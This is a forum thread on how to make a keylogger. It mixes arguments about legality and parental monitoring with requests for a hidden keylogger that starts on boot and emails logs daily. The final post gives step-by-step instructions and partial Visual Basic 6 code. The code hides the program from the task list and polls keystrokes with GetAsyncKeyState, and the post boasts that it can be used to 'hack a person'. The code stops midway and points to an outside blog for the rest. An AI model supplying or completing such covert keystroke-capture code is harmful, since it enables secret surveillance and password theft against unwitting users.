xisto Community
Zubair1

Key Logger. How To Make

Hillsidenights - Not to start an arguement here, but seriously?  You're obviously a naive kid.  You say you don't do "bad stuff", but at the same time you threatened to do some pretty dumb stuff to worrieddad.  IF you actually could do what you threatened (which I doubt) and IF you acted on those threats, the FBI would kick in your door to arrest you.  What you described would be felony hacking (probably across state lines).  If you actually made any phone calls in the process...They'd probably throw in a stalking charge for good measure.  Since you're 13, you might end up in a juvenile delinquents home, but you'd probably end up staying at home with your parents.  You would have some form of probation until you were in your 20s that either didn't allow you to have access to either an internet connection or if the judge was really trying to teach you a lesson, you might not be allowed to touch a computer at all.  Good luck getting through high school without being able to type up your book reports!  Oh...And since you have that felony on your record...The best college option you'll have will be the local community college (and don't hope for any financial aid).

HillsidenightsKey Logger.

Well wow we have quite the teenage angst issue going on with our friend Hillsidenights. Let me respond to your poorly constructed jumble of a comment by first saying, if you must post a novel on a forum please use correct spacing, spelling, basic grammar, etc. Also your hypothetical response to your parents monitoring you with a keylogger demonstrates your strange and very unhealthy relationship with your parents. To say that you would go on a rampage because your parents monitored the computer they most likely purchased for you with their money earned from their jobs merely attests to your immaturity and selfishness. If a parent purchases a computer they have the right to do with it as they please because it is  their property, not yours. Conversely, if you did purchase your own computer you still are operating it in their house, (hopefully) following their rules and connecting to the internet service they pay for. 

In addition, throughout your post, your arguments were based on speculation and opinion rather than facts. For example, "Keyloggers and filthy, discusting, and really have no good uses

In summary, please respect your parents and their property and how they wish to treat that property.

-reply by terrapin

hey, I have an idea for you! okay, I don't know how to savetext into a file, butI know how you can save all of the text as a single variable.

Heres your code :

Private Sub Command1_KeyPress(KeyAscii As Integer)Newkey = Chr(KeyAscii)Prevkeys = keystringKeystring = prevkeys + newkeyText1.Text = keystringEnd Sub

This code needs 3 string variables to be created "newkey" "prevkeys" and "keystring", and it will keep adding 1 letter to "keystring" each time you enter one :)

Hope I helped, I'm gonna look up how to save text into files later..

-reply by Insaniak

I'm still waiting for a tutorial on how to do this, still, no one is posting >.< Can I havea tutorial site where I could learn on how to code this? I like a keylogger that would run on the background process and hidden, starts on startup.then everyday it emails all the key logs that have been made in a day? is that possible?

Hi Pe Posted Image ple ,

Can Any One Tell me how to build a Keylogger on Visual Bais 6.0

that no one could see on the End Task Menu

This is a simple script for vb6. you can store all keys typed by a user. you only need to do some simple steps.

if you are making this program to run on startup it stores all keys. through this you can even hack a person.

its an amazing !!!

1. open visual basic and start a 'standard form'.

2. add a timer, one text box to the form.

3. make form visibility hidden.

4. copy the below code to code window.

.............................................................................................

Dim result As Integer

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Private Sub Form_Load()

App.TaskVisible = False 'makes your form invisible from user

End Sub

Private Sub Timer1_Timer()

For i = 32 To 128 'Changed to 32 to 128

result = 0

for complete code visit http://extracoding.blogspot.de/